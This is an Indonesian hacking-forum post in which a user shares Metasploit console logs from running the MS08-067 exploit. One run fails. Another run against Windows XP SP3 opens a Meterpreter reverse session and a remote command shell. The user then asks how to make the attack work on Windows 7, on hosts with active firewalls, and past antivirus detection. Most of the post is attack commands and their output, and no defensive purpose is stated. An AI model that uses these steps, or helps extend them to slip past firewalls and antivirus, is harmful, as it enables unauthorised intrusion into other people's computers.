ASK Metasploit
#1
msf exploit(ms08_067_netapi) > exploit

Started reverse handler on port 4444
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 2+ - lang:English
Could not determine the exact service pack
Exploit completed, but no session was created.

itu tak coba pada windows 7 juga gitu kenapa ya??? mohon pencerahan

kalo ini berhasil :apn::apn::apn:

msf exploit(ms08_067_netapi) > exploit

Started reverse handler on port 4444
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 3 - lang:English
Selected Target: Windows XP SP3 English (NX)
Triggering the vulnerability...
Sending stage (723456 bytes)
Meterpreter session 3 opened (202.111.xx.xxx:4444 -> 202.111.xx.xxx:1144)

meterpreter > shell
Process 2868 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Mohon pencerahan buat windows 7 n windows yang firewall aktif / metasploit terdeteksi oleh anti virus :apn::apn::apn:


Messages In This Thread
ASK Metasploit - by phython - 07-02-2011, 02:52 PM
RE: ASK Metasploit - by zee eichel - 07-02-2011, 06:12 PM
RE: ASK Metasploit - by phython - 08-14-2012, 05:46 PM
RE: ASK Metasploit - by whitehat - 11-25-2011, 12:11 AM
RE: ASK Metasploit - by cassaprodigy - 11-25-2011, 03:22 PM
RE: ASK Metasploit - by rollyahmad - 12-03-2011, 05:05 AM
RE: ASK Metasploit - by Al - Ayyubi - 08-14-2012, 09:39 PM
RE: ASK Metasploit - by red-dragon - 09-20-2012, 11:48 AM
RE: ASK Metasploit - by dvil - 10-17-2012, 12:13 PM
RE: ASK Metasploit - by zee eichel - 10-17-2012, 12:41 PM




Users browsing this thread: 1 Guest(s)